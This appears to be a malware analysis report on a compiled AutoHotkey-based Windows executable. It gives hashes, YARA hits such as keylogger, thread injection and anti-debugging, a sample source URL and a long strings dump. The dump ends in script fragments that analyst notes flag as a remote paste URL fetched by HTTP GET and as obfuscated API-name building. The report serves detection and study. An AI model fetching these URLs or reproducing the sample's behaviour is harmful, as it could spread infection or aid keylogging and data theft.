
Sample details: d1d714fc9bde4aad75998ba45a933678 --

Hashes
MD5: d1d714fc9bde4aad75998ba45a933678
SHA1: a7da074592bcadd8e26592766d657e9ecc3580e5
SHA256: 9e47d8be989029238bc519097846c8ed92081d790b1e1429a52e0932126ab1b7
SSDEEP: 24576:nNR2zaQBt37/CZ0w1PeWnzqhqCC6+PELef:+UsrC6aEk
Details
File Type: PE32
Yara Hits
YRP/VC8_Microsoft_Corporation | YRP/Microsoft_Visual_Cpp_8 | YRP/IsPE32 | YRP/IsWindowsGUI | YRP/IsBeyondImageSize | YRP/HasRichSignature | YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/anti_dbg | YRP/inject_thread | YRP/escalate_priv | YRP/screenshot | YRP/keylogger | YRP/win_mutex | YRP/win_registry | YRP/win_token | YRP/win_files_operation | YRP/win_hook | YRP/Str_Win32_Winsock2_Library | YRP/Str_Win32_Internet_API |
Source
https://e.coka.la/w1OJ7Z.png
Strings
		!This program cannot be run in DOS mode.
`.rdata
@.data
D$8QRP
L$4QPS
:O r8<
	trHtaH
L$4WUP
u'8D$/
T$@@PQRh@
D$4Ph@
PWQVUj
USRPQ2
<nu hM
<[t$<\t 
D$4QPVSW
L$0RPQ
T$,URVS
L$ WRPQ
thHt6H
tTIt,I
T$ 9t$
tHh\1J
E$_^][
T$$Rh`3J
T$$QRVU
L$$Qh`3J
D$$RPj
@ SUVW
PSVUVS
																
																															
																															
																
																															
																															
F(:F)r+
RQh47J
(v Wh@7J
V+RUWQP
t*h((J
D$ <Vu
L$,RSW
|$0UPQ
VtXIt/Iut
9L$8td
8\$	tL:
L$0QSjn
tIhTJJ
tIh\1J
tah\1J
t+h KJ
trh0LJ
u"VhpMJ
SSSjhW
SSSjhW
SSSjhW
D$\PQ3
T$4QR3
L$4PQ3
t.;\$ u(
t=Ht&H
9L$DtU
:t!j:P
l$,h\PJ
|$09T$,
f97tK9t$,u/V
UWhdZJ
UUUUUUS
VVVjgU
M`QhHUJ
l$ _^][
L$ Uh8ZJ
<ore<qwa
u1Phh]J
-uRf9E
	t4h\PJ
\$$f9}
t$ f9]
t$ ;t$8
<it'<pt#
T$HRPW
L$8RPQ
										
																															
																													
\$DVUS
@PQVW3
D$DPUS
ujh|bJ
							
																														
																																																		
																																								
																																															
																			
L$ VQj
t@8H=u
Su3jRj
L$(QRW
>tu	9~
t{WWWjsU
WWWWWj
T$&h0JJ
D$&h`'J
T$&hp'J
T$&h,jJ
D$&h@jJ
L$$h\jJ
T$&h0JJ
L$&hp'J
T$&hdjJ
D$&hxjJ
L$&h@jJ
L$&h8JJ
T$&h0JJ
L$ h(kJ
T$ h8kJ
T$ hDkJ
D$ hPkJ
L$ hhkJ
D$,hHJJ
T$ h,lJ
D$ h<lJ
L$ hHlJ
T$ hXlJ
D$ hhlJ
L$ hxlJ
T$ hTIJ
D$ hlIJ
L$ h`IJ
T$ h IJ
D$ hxIJ
L$ h0IJ
T$ h8IJ
D$ hDIJ
L$ hLIJ
D$ hX J
L$$h mJ
T$&h(mJ
D$&h`'J
L$&h0mJ
T$&hDmJ
D$&hp'J
L$&hPmJ
T$&h`mJ
D$&htmJ
L$&h|mJ
L$&h(nJ
T$&h@nJ
D$&hPnJ
L$&h`nJ
T$ hpnJ
D$ h|nJ
D$,hpnJ
D$ h(oJ
8L$$uUj
D$(PVh(
L$$QUS
D$(_[^
t	G;=<fL
unhp'J
																															
<t?Ot O
t%<kt!<rt
T$(RVj
D$(PVj
T$(RVj
D$(PVj
D$@f90t&
L$lQPV3
L$'QVR
D$ VPt
T$dPQRS
T$hWPQRS
T$(RVj
D$(PVj
T$(RVj
D$ WVP
L$ RPQ
tG;|$<t-
RPh 3J
tVh8_J
D$LRPQ
L$$RPQ
 !"#$%%&'())*+,-./0123456789:;<="">?
EE""""FFFFFGHFFIJKLMNOPQRSTTUVWX
YZ[\]^^__`abcdefghijklmnopqrstuvwxyz{|}~
t)f9(u$
t(f9(u#
Ht"HuFW
D$4PRj
D$4PRj
D$ PUj
T$ RUj
|$T.u!f
|$T.u f
L$0RWSP
T|@f9T$@
T$@@PQRh@
<	r{< ww<
PRQhd|J
PQh4|J
QPh\}J
RQh\}J
t	F;5d
<G9s(~4
L$8QRPW
t>hLNJ
t6hLNJ
tyhH1J
tah\1J
D$ f97
l$ f9u
L$,jHPQ
T$`jHRP
u?9D$$u
D$\QVRh
L$xSQRh
L$PQRh
Wf9.ty
f9(u4;
D$8+D$0
T$H+L$4
T$$;T$
D$LPQf
L$,RPQ
T$,PSR
L$,RPQ
																							
						
D$0+D$(
D$4+D$,
l$DVWP
|$$+|$
D$ +D$
D$ +D$
D$$+D$
9D$H}P
T$HRPQ
L$HQUS
D$(;D$ 
L$ QPj
$Rh |G
SPh8ZJ
~m_^][
D$ +D$
D$$+D$
VPh8ZJ
RQQQP3
D$,PFG
L$,WVQ
L$8RPWVj
D$,VWP
T$8RPQS
L$HSVQ
PQRSVj
\$$9\$D
C;\$@}
T$$;T$D|
t$ ;t$p
t$,9D$D
D$T;D$@}
D$$;D$D
t$ ;t$p
LF=plL
LF=xiL
D$4+D$,
													
T$(+T$ 
|$,+|$$
D$<PQS
T$<RPS
T$<RPS
L$<QRS
t(Hu-9F
T$$PQR
T$0@PQRh@
L$8Qh@
u _^]3
\$08L$
f;D$$u
f;D$$uh
T$ PQRS
\$,9\$ 
D$0;L$<u
D$,;D$ 
L$,;L$<r
							
|D.\t 
QVSWUR
T$4RUP
D$pj}P
T$pj\R
D$$PWVS
B0_^][
L$$QSUV
T$8j\R
|$ uif
|$T.u f
u		D$(
\$$uyf
f9L$htUj
2w	f95
u1j?h|
9D$$~*
@;D$$|
T$0RPW
T$$PQRh
L$ VQP
=ERCPtK-PCRE
D$ )D$
;L$,~E
;t$,| 
8ERCPu
WWWWQRWP
t(Hu-9F
9t$(u29t$8u,
D$(9D$
D$hF;u
D$(;D$
L$@QWh`
	D$0	D$,
T$ RPSQ
<w\t&f
l$hVWh
L$$+L$
T$(+T$ j
L$DQWf
T$PRPS
D$$+D$
D$ +D$
SUVWhp
t$4f9t$HtK
t'f97t"h
T$$Rhh
T$$Rhx
T$(RSP
T$,RVP
T$0RVP
L$ QSR
f9<Vu<
BRPQh@
-tcj:V
^4SSh,
tCUUUj
AH_^][
F;5PlL
T$$RS3
u*9D$$u$
T$$VRP
L$$VQP
L$DWh8ZJ
L$$RPQU
D$8+D$0
D$<+D$4
T$4RPj
D$,_^][
f;NFuG
L$<+L$4
D$8+D$0
D$PPQR
D$4PQj
|$HCSRh
8\$,t3
D$,PVQ
F;5PlL
ux9{xu/
Cx9{|u/
L$4f90
9D$(~r
9D$4~A
T$DPQhX
T$DPQh
L$DRPhX
L$DRPh
L$DRPh
L$DRPh
T$<PQSh,
D$@QRh,
D$@QRh,
D$`HPh@
L$@RPh,
T$@QSPhLNJ
D$@QRh,
D$@QRh,
D$@QRh,
T$@PQh,
L$HQRj
L$@RPh,
D$<QRVh,
D$@QRh,
L$DRPh
D$P+D$H
L$L+D$H+L$D
L$HQRj
						
8D$xt$
u	8D$x
u	8D$x
8D$xt	
u8PPPP
8D$xtW
u)hdLJ
8D$xt:
u38D$xt!
8D$xt	
u*8D$xt
u#8D$xt
D$8+D$0
9\$xtl
									
f;QFu=
D$$QRP
L$8QRj
D$@;D$
T$@+T$8
T$@+T$8
D$<+D$4
D$@+D$8
\$P+l$D+\$H
L$|+L$t+
QSUVPR
tEHt(Ht
D$`PVhX
L$dQ@P
4FC;\$
D$$_^[
L$8QRh<
										
															
						
																																	
																																												
SUVWu/
t|_^][Y
tH_^][Y
T$,+T$$
D$(+D$ 
T$4RPj
9l$<ur
T$(RUhL
D$0Pj2
D$(PSW
D$(Ph,
\$$Ph,
L$(QSW
								
u/f9LE
D$(SQR
D$ j	P
F;5PlL
FtG;=PlL
u"8^=u
SVWt	3
D$$;D$
4SVW;A
;D$<|9
QRSVWP
D$$PVh
D$(XiJ
L$4QVS
L$$QPSR
D$$PQQ
RQQQSP
RQQQSP
D$$SVj
D$4PVW
\$ 9D$0
n,;|$0
48;t$0
^,;|$0
xG;|$0s
u	_^]2
t\Kt=Kt
QSVWj@
8T$4tZ
D$ +D$
^[]_@Y
^[]_@Y
l$ ;D$,
\$,;l$(
t4;D$$
L$DSQV
|$L;D$(rJ
<J9|$Tu"
D$<QRP
l$$+D$(
L$`PQWU
uO_^][
T$lPQRU
L$`QRPW
\$HUVW
L$<PQW
u3_^][
t+_^][
T$ VRU
t3Hu89F
Ht?HuD
t(Hu-9F
t$Hu)9^
t$Hu)9^
@ HtlHtV
xStQSU
auyf9]
auUf9Z
L$0QWR
l$>jDR
@ Ht|Htg
L$ WQV
\$8VWS
;t$0tV
D$0URQ
						
|$ #u|
9D$Xt"
D$$9D$T
D$P9z$w
D$$;D$T
D$P9z$w
ur9l$,
<O;p,|
D$,;B,
T$,9Q,~1
T$,;Q,|
T$dQRP
<G;n,|
	BD;J@~
L$`_^]
t9_^]3
T$4RWWWW
L$4QPPPP
L$L;L$8vR3
;L$8v@
L$$VQUW
T$$QRUP
L$$PQSU
A;V|w(
@PQSRW
D$$+|$$
u\C;\$
D$x+Qx
T$|+Ax
9HDt	;hx
f;S,u 
T$(;T$
RPQSUF
D$(;D$
t!;h|r
BRPQWSVU
BRPQWSVU
@PQRWSVU
BRPQWSVU
9D$$t89D$(t2A
AQVRWSPU
BRVPWSQU
9D$$t+A
AQVRWSPU
BRVPWSQU
AQRPWVSU
BRPQWVSU
BRPQWVSU
@PQRWVSU
BRPQWVSU
BRQSPW
D$(WPU
AQRSVPWU
@PQSVRW
@PQSVRWU
D$(;D$
RPWQVU
PSQRUF
AQSRVWPU
BRSPVWQU
@PQRVWSU
AQRPVWSU
RWPQUC
QRSPWUF
QRSPWUF
QRSPWUF
QRSPVUG
QRSPWUF
PQSRWUF
QRSPWUF
RPSQVUG
PQVRSUG
PQVRSUG
PQSRVUG
PVQRUG
QVSRPUG
@PQRWVSU
 !"#$%%%%%%&&'()*+%%%%%%&&'()*+,,,,,,--./012QQQQQQQQ334556789999:;<;<=>=?@AB=?@ABQQQQQCDEFGHIJKLMN
PPPPPPP
9E u	9E$
f9L$ t4;
G;D$Lvj
L$<f;L$
wa;\$Hv7f
ERCPt'
ERCPt*
ERCPt;
ERCPt+
u)jAXf;
u)jAXf;
9U tO9U$uE9U(uE3
9E vgPQj
9U$tE+
9u(vEVSj
9u v&VQj
v	N+D$
^SSSSS
j@j ^V
t"SS9] u
URPQQh
t	j\Yf
QQSVWh
PPPPPPPP
PPPPPPPP
tCHt(Ht 
;t$,v-
UQPXY]Y[
v	N+D$
<+t"<-t
+t HHt
QQSVWd
VC20XC00U
t*=RCC
;7|G;p
tR99u2
CorExitProcess
bad allocation
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
FlsFree
FlsSetValue
FlsGetValue
FlsAlloc
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
Unknown exception
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
GetProcessWindowStation
GetUserObjectInformationW
GetLastActivePopup
GetActiveWindow
MessageBoxW
(null)
`h````
xpxxxx
 Complete Object Locator'
 Class Hierarchy Descriptor'
 Base Class Array'
 Base Class Descriptor at (
 Type Descriptor'
`local static thread guard'
`managed vector copy constructor iterator'
`vector vbase copy constructor iterator'
`vector copy constructor iterator'
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector vbase copy constructor iterator'
`eh vector copy constructor iterator'
`managed vector destructor iterator'
`managed vector constructor iterator'
`placement delete[] closure'
`placement delete closure'
`omni callsig'
 delete[]
 new[]
`local vftable constructor closure'
`local vftable'
`udt returning'
`copy constructor closure'
`eh vector vbase constructor iterator'
`eh vector destructor iterator'
`eh vector constructor iterator'
`virtual displacement map'
`vector vbase constructor iterator'
`vector destructor iterator'
`vector constructor iterator'
`scalar deleting destructor'
`default constructor closure'
`vector deleting destructor'
`vbase destructor'
`string'
`local static guard'
`typeof'
`vcall'
`vbtable'
`vftable'
operator
 delete
__unaligned
__restrict
__ptr64
__eabi
__clrcall
__fastcall
__thiscall
__stdcall
__pascal
__cdecl
__based(
`h`hhh
xppwpp
1#QNAN
1#SNAN
SendInput
RtlGetVersion
RemoveClipboardFormatListener
AddClipboardFormatListener
BlockInput
GetProcessId
GetLayeredWindowAttributes
EnumDisplayMonitors
GetMonitorInfoW
GetDiskFreeSpaceExW
GetCursorInfo
GetProcessImageFileNameW
CreateProcessWithLogonW
InternetOpenW
InternetOpenUrlW
InternetCloseHandle
InternetReadFileExA
InternetReadFile
SHEmptyRecycleBinW
CreateToolhelp32Snapshot
Process32FirstW
Process32NextW
Arabic
Armenian
Avestan
Balinese
Bengali
Bopomofo
Brahmi
Braille
Buginese
Canadian_Aboriginal
Carian
Cherokee
Common
Coptic
Cuneiform
Cypriot
Cyrillic
Deseret
Devanagari
Egyptian_Hieroglyphs
Ethiopic
Georgian
Glagolitic
Gothic
Gujarati
Gurmukhi
Hangul
Hanunoo
Hebrew
Hiragana
Imperial_Aramaic
Inherited
Inscriptional_Pahlavi
Inscriptional_Parthian
Javanese
Kaithi
Kannada
Katakana
Kayah_Li
Kharoshthi
Lepcha
Linear_B
Lycian
Lydian
Malayalam
Mandaic
Meetei_Mayek
Mongolian
Myanmar
New_Tai_Lue
Ol_Chiki
Old_Italic
Old_Persian
Old_South_Arabian
Old_Turkic
Osmanya
Phags_Pa
Phoenician
Rejang
Samaritan
Saurashtra
Shavian
Sinhala
Sundanese
Syloti_Nagri
Syriac
Tagalog
Tagbanwa
Tai_Le
Tai_Tham
Tai_Viet
Telugu
Thaana
Tibetan
Tifinagh
Ugaritic
ACCEPT
COMMIT
 !""#$%&'((()*+,-./0123456789:;<=>?@AABCDEFGHFIJKKALAAM
NOPQRSTUVWXYZ[\F]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]^]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]_`aaaaaaaabccdefghijklmno"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""pqqqqqqqqqqqqqqqqrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr]]stuvwwxyz{|}~
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
xdigit
no error
\ at end of pattern
\c at end of pattern
unrecognized character follows \
numbers out of order in {} quantifier
number too big in {} quantifier
missing terminating ] for character class
invalid escape sequence in character class
range out of order in character class
nothing to repeat
operand of unlimited repeat could match the empty string
internal error: unexpected repeat
unrecognized character after (? or (?-
POSIX named classes are supported only within a class
missing )
reference to non-existent subpattern
erroffset passed as NULL
unknown option bit(s) set
missing ) after comment
parentheses nested too deeply
regular expression is too large
failed to get memory
unmatched parentheses
internal error: code overflow
unrecognized character after (?<
lookbehind assertion is not fixed length
malformed number or name after (?(
conditional group contains more than two branches
assertion expected after (?(
(?R or (?[+-]digits must be followed by )
unknown POSIX class name
POSIX collating elements are not supported
this version of PCRE is compiled without UTF support
spare error
character value in \x{...} sequence is too large
invalid condition (?(0)
\C not allowed in lookbehind assertion
PCRE does not support \L, \l, \N{name}, \U, or \u
number after (?C is > 255
closing ) for (?C expected
recursive call could loop indefinitely
unrecognized character after (?P
syntax error in subpattern name (missing terminator)
two named subpatterns have the same name
invalid UTF-8 string
support for \P, \p, and \X has not been compiled
malformed \P or \p sequence
unknown property name after \P or \p
subpattern name is too long (maximum 32 characters)
too many named subpatterns (maximum 10000)
repeated subpattern is too long
octal value is greater than \377 in 8-bit non-UTF-8 mode
internal error: overran compiling workspace
internal error: previously-checked referenced subpattern not found
DEFINE group contains more than one branch
repeating a DEFINE group is not allowed
inconsistent NEWLINE options
\g is not followed by a braced, angle-bracketed, or quoted name/number or by a plain number
a numbered reference must not be zero
an argument is not allowed for (*ACCEPT), (*FAIL), or (*COMMIT)
(*VERB) not recognized
number is too big
subpattern name expected
digit expected after (?+
] is an invalid data character in JavaScript compatibility mode
different names for subpatterns of the same number are not allowed
(*MARK) must have an argument
this version of PCRE is not compiled with Unicode property support
\c must be followed by an ASCII character
\k is not followed by a braced, angle-bracketed, or quoted name
internal error: unknown opcode in find_fixedlength()
\N is not supported in a class
too many forward references
disallowed Unicode code point (>= 0xd800 && <= 0xdfff)
invalid UTF-16 string
AtlAxGetControl
AtlAxWinInit
StrCmpLogicalW
SetMenuInfo
RegDeleteKeyExW
IsWow64Process
GdiplusStartup
GdiplusShutdown
GdipCreateBitmapFromFile
GdipCreateHBITMAPFromBitmap
GdipDisposeImage
SetWindowTheme
IsHungAppWindow
Error text not found (please report)
DEFINE
UTF16)
NO_START_OPT)
ANYCRLF)
BSR_ANYCRLF)
BSR_UNICODE)
argument is not a compiled regular expression
argument is compiled in 8 bit mode
internal error: opcode not recognized
internal error: missing capturing bracket
failed to get memory
@Access violation - no RTTI data!
Bad dynamic_cast!
bad exception
WSOCK32.dll
joyGetPosEx
mciSendStringW
mixerOpen
mixerGetDevCapsW
mixerGetLineInfoW
mixerClose
mixerGetLineControlsW
mixerGetControlDetailsW
mixerSetControlDetails
waveOutGetVolume
waveOutSetVolume
joyGetDevCapsW
WINMM.dll
GetFileVersionInfoSizeW
GetFileVersionInfoW
VerQueryValueW
VERSION.dll
InitCommonControlsEx
ImageList_GetIconSize
ImageList_Create
ImageList_Destroy
ImageList_AddMasked
ImageList_ReplaceIcon
CreateStatusWindowW
COMCTL32.dll
GetModuleBaseNameW
GetModuleFileNameExW
PSAPI.DLL
MulDiv
GetTickCount
SetCurrentDirectoryW
InitializeCriticalSection
SetErrorMode
GetCurrentDirectoryW
GlobalLock
GlobalAlloc
GlobalFree
GlobalUnlock
GetCurrentThreadId
lstrcmpiW
CreateThread
SetThreadPriority
GetExitCodeThread
CloseHandle
CreateMutexW
GetLastError
GetProcAddress
GetModuleHandleW
GetVersionExW
GetCPInfo
DeleteCriticalSection
GetModuleFileNameW
GetSystemTimeAsFileTime
FindResourceW
SizeofResource
LoadResource
LockResource
FindFirstFileW
FindNextFileW
FindClose
FileTimeToLocalFileTime
SetEnvironmentVariableW
MoveFileW
OutputDebugStringW
CreateProcessW
GetFileAttributesW
WideCharToMultiByte
MultiByteToWideChar
GetExitCodeProcess
WriteProcessMemory
ReadProcessMemory
GetCurrentProcessId
OpenProcess
TerminateProcess
SetPriorityClass
SetLastError
GetEnvironmentVariableW
GetLocalTime
GetDateFormatW
GetTimeFormatW
GetDiskFreeSpaceW
SetVolumeLabelW
CreateFileW
DeviceIoControl
GetDriveTypeW
GetVolumeInformationW
CreateDirectoryW
ReadFile
WriteFile
DeleteFileW
SetFileAttributesW
LocalFileTimeToFileTime
SetFileTime
GetFileSizeEx
GetSystemTime
GetSystemDefaultUILanguage
GetComputerNameW
GetWindowsDirectoryW
GetTempPathW
GetFullPathNameW
GetShortPathNameW
LoadLibraryW
FreeLibrary
EnterCriticalSection
LeaveCriticalSection
VirtualProtect
QueryDosDeviceW
CompareStringW
RemoveDirectoryW
CopyFileW
GetCurrentProcess
FormatMessageW
GetPrivateProfileStringW
GetPrivateProfileSectionW
GetPrivateProfileSectionNamesW
WritePrivateProfileStringW
WritePrivateProfileSectionW
SetEndOfFile
GetACP
GetFileType
GetStdHandle
SetFilePointerEx
SystemTimeToFileTime
FileTimeToSystemTime
GetFileSize
VirtualAllocEx
VirtualFreeEx
EnumResourceNamesW
LoadLibraryExW
GlobalSize
KERNEL32.dll
IsClipboardFormatAvailable
CharUpperW
GetDlgCtrlID
GetParent
SetTimer
GetMessageW
GetForegroundWindow
GetWindowThreadProcessId
GetClassNameW
GetFocus
PeekMessageW
KillTimer
TranslateAcceleratorW
GetKeyState
GetWindowLongW
SendMessageW
IsDialogMessageW
ScreenToClient
SetWindowLongW
CountClipboardFormats
ShowWindow
TranslateMessage
DispatchMessageW
IsWindow
EndDialog
FindWindowW
PostMessageW
EmptyClipboard
SetClipboardData
CloseClipboard
GetClipboardFormatNameW
GetClipboardData
OpenClipboard
ReleaseDC
CharLowerW
CallNextHookEx
GetKeyboardLayout
ToUnicodeEx
IsCharAlphaNumericW
IsCharLowerW
IsCharUpperW
PostThreadMessageW
SetWindowsHookExW
UnhookWindowsHookEx
SendMessageTimeoutW
PostQuitMessage
RegisterHotKey
UnregisterHotKey
SendInput
AttachThreadInput
GetAsyncKeyState
GetCursorPos
GetKeyboardState
SetKeyboardState
keybd_event
GetSystemMetrics
WindowFromPoint
mouse_event
GetWindowTextW
VkKeyScanExW
MapVirtualKeyExW
MapVirtualKeyW
IsCharAlphaW
DestroyWindow
DestroyIcon
LoadCursorW
RegisterClassExW
CreateWindowExW
GetMenu
EnableMenuItem
LoadAcceleratorsW
SetClipboardViewer
ChangeClipboardChain
LoadImageW
MessageBoxW
CheckMenuItem
IsWindowVisible
SetWindowTextW
GetIconInfo
SetRect
DrawTextW
AdjustWindowRectEx
SystemParametersInfoW
GetClientRect
GetWindowRect
GetQueueStatus
MoveWindow
EnumChildWindows
SetActiveWindow
GetGUIThreadInfo
SetFocus
SetWindowRgn
SetWindowPos
SetLayeredWindowAttributes
InvalidateRect
EnableWindow
GetWindowTextLengthW
EnumWindows
IsZoomed
IsIconic
RegisterWindowMessageW
GetSysColor
GetSysColorBrush
DrawIconEx
FillRect
DefWindowProcW
SetForegroundWindow
DialogBoxParamW
SendDlgItemMessageW
GetDlgItem
SetDlgItemTextW
IsWindowEnabled
MessageBeep
ClientToScreen
GetCursor
GetLastInputInfo
GetMenuItemCount
GetMenuItemID
GetSubMenu
GetMenuStringW
ExitWindowsEx
SetMenu
FlashWindow
MapWindowPoints
RedrawWindow
SetParent
GetClassInfoExW
GetAncestor
UpdateWindow
GetMessagePos
GetClassLongW
DefDlgProcW
CallWindowProcW
CheckRadioButton
IntersectRect
PtInRect
CreateAcceleratorTableW
DestroyAcceleratorTable
InsertMenuItemW
SetMenuDefaultItem
RemoveMenu
SetMenuItemInfoW
IsMenu
GetMenuItemInfoW
CreateMenu
CreatePopupMenu
SetMenuInfo
AppendMenuW
DestroyMenu
TrackPopupMenuEx
CreateIconIndirect
GetDesktopWindow
CopyImage
CreateIconFromResourceEx
EnumClipboardFormats
GetWindow
BringWindowToTop
GetTopWindow
USER32.dll
GetDeviceCaps
DeleteObject
CreateFontW
CreateSolidBrush
CreateDCW
GetStockObject
SelectObject
GetTextFaceW
GetTextMetricsW
GetObjectW
DeleteDC
CreateEllipticRgn
CreateRoundRectRgn
CreateRectRgn
CreatePolygonRgn
CreateCompatibleDC
GetDIBits
GetSystemPaletteEntries
CreateCompatibleBitmap
BitBlt
GetPixel
SetBkColor
SetTextColor
ExcludeClipRect
GetClipRgn
FillRgn
GetClipBox
GetCharABCWidthsW
SetBkMode
EnumFontFamiliesExW
CreateDIBSection
GdiFlush
GDI32.dll
GetSaveFileNameW
GetOpenFileNameW
CommDlgExtendedError
COMDLG32.dll
RegConnectRegistryW
RegCloseKey
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumValueW
RegEnumKeyExW
GetUserNameW
OpenSCManagerW
LockServiceDatabase
UnlockServiceDatabase
CloseServiceHandle
OpenProcessToken
LookupPrivilegeValueW
AdjustTokenPrivileges
RegQueryValueExW
RegCreateKeyExW
RegSetValueExW
RegDeleteKeyW
RegDeleteValueW
ADVAPI32.dll
DragQueryFileW
DragFinish
Shell_NotifyIconW
ShellExecuteExW
SHGetFolderPathW
SHGetMalloc
SHGetDesktopFolder
SHBrowseForFolderW
SHGetPathFromIDListW
SHFileOperationW
DragQueryPoint
ExtractIconW
SHELL32.dll
OleInitialize
OleUninitialize
CoCreateInstance
CoInitialize
CoUninitialize
CLSIDFromString
CoGetObject
StringFromGUID2
CreateStreamOnHGlobal
ole32.dll
OLEAUT32.dll
HeapAlloc
ExitProcess
HeapReAlloc
HeapFree
HeapSize
HeapQueryInformation
GetCommandLineW
HeapSetInformation
GetStartupInfoW
InterlockedIncrement
InterlockedDecrement
GetOEMCP
IsValidCodePage
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
HeapCreate
InitializeCriticalSectionAndSpinCount
SetHandleCount
IsProcessorFeaturePresent
GetStringTypeW
RaiseException
LCMapStringW
RtlUnwind
GetConsoleCP
GetConsoleMode
FreeEnvironmentStringsW
GetEnvironmentStringsW
QueryPerformanceCounter
SetFilePointer
FlushFileBuffers
WriteConsoleW
SetStdHandle
GetProcessHeap
VirtualQuery
.?AVtype_info@@
.?AVbad_alloc@std@@
.?AVexception@std@@
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVbad_cast@std@@
.?AVbad_typeid@std@@
.?AV__non_rtti_object@std@@
.?AUIObject@@
.?AVComObject@@
.?AV?$CKuStringT@_WVCKuStringUtilW@@@@
.?AVTextMem@@
.?AVTextFile@@
.?AVExprOpFunc@@
.?AVTextStream@@
.?AVObjectBase@@
.?AVProperty@@
.?AVLabel@@
.?AUIUnknown@@
.?AUIDispatch@@
.?AUIObjectComCompatible@@
.?AVFunc@@
.?AVObject@@
""""&*.266::>>>CCCCCHMMVV$
.?AVCStringCharFromWChar@@
.?AVCStringWCharFromChar@@
.?AV?$CKuStringT@DVCKuStringUtilA@@@@
.?AVRegExMatchObject@@
.?AVComArrayEnum@@
.?AVEnumBase@@
.?AVComEnum@@
.?AVComEvent@@
.?AVBoundFunc@@
.?AVMetaObject@@
.?AVEnumerator@Object@@
.?AVFileObject@@
.?AVbad_exception@std@@
0Au#&h
 WQV PV
@c`eV&v
rvVE0u@
@!x@07
 phDv"
"""""/
; <COMPILER: v1.1.23.00>
; Analyst note: remote paste URL stored here for an HTTP GET issued later in the
; script (network IoC).
tutVTtpJk := "https://paste.ee/r/zBm4q"
; Analyst note: the statements below build an API name one fragment per statement,
